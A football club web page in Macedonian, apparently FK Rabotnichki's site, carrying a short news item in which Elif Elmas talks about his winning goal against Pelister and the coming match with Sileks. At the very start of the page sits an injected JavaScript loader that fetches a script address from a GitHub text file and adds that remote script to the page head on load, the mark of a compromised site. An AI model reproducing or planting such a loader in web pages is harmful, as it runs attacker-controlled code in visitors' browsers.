;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Елмас: Среќен сум за голот, но уште посреќен што донесов победа против Пелистер
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Елмас: Среќен сум за голот, но уште посреќен што донесов победа против Пелистер

Работнички оствари значаен триумф над Пелистер (0-1) на гостувањето во Охрид и се врати на третата позиција на табелата, со идентичен број бодови како и битолскиот прволигаш. По двата порази во досегашниот дел од сезоната, тимот на Виктор Треневски му возврати на Пелистер и освои три важни бода. Прекрасен погодок на овој меч постигна младинскиот репрезентативец Елиф Елмас.

„Среќен сум што постигнав убав погодок, беше одбележан и во медиумите како еден од најубавите во досегашниот тек од сезоната. Ја следев топката по центаршутот од десната страна, Ивановски ја префрли со глава, а јас зафатив волеј и, за среќа, таа заврши зад грбот на голманот на Пелистер. Уште посреќен сум што со тој погодок Работнички стигна до многу важна победа и три бода. Но, сега тоа е веќе зад нас и се подготвуваме за следниот предизвик. Верувам дека ќе одиграме исто така квалитетно и на саботниот меч против Силекс и дека ќе се радуваме на нова победа“, вели херојот од претходниот дерби – дуел со Пелистер, Елиф Елмас.

Работнички ќе го пречека Силекс на „Телеком Арена“ в сабота, со почеток од 14 часот, во рамките на 23.коло од Првата фудбалска лига на Македонија.